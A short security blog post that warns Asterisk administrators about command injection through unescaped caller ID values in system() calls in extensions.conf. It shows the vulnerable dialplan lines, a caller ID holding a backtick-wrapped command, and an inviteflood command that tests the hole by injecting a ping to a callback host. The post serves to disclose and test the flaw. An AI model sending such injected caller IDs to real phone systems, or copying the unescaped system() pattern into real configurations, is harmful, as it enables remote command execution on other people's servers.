careful when using system() inside extensions.conf

If you want your asterisk pbx to send out emails or write information into a logfile, you might find examples using the system() command.
Based on some google/github searches, you might be tempted to write something like this:

exten => 666,1,system(mail -s "Missed Call ${CALLERID(num)}" foo@bar < /path/call.msg)
exten => 666,2,system(echo "${DATETIME} - ${CALLERID(num)}" >> /log/calls)

Please be aware that there is no proper escaping done on the ${CALLERID(num)} variable.
An attacker might set the callerid to:
`some bad command`@your.pbx
Which is probably problematic. :)

If you are looking for a quick way of testing, take a look at inviteflood which is part of the kali linux distribution:

Usage is simple:
inviteflood <interface> <user> <domain> <target-ip> <packet-count> -a <callerid>
For example:
inviteflood tun3 666 your.pbx 1 -a '`/bin/ping pingbackhost -c 1`'
(Then look for pings on 'pingbackhost' or attempts to resolve the domain.)

Talk to me

IT-Dienstleistungen Sven Tantau
Drostestrasse 3
53819 Neunkirchen
USt-Id-Nr.: DE203610693

skype: sven2342
phone: +49 22 47 90 80 250
mobile/signal: +49 157 3131 4424

OTR-Fingerprint: 7849BD93B65F9E4BC1206B06C09B7445721063BC
GPG/PGP-Key: (pub 4096R/069DD13C 2014-02-13) local copy
GPG/PGP-Key: fingerprint: 9BAD 94D3 9176 5BD1 F64F 542E 37E4 3542 069D D13C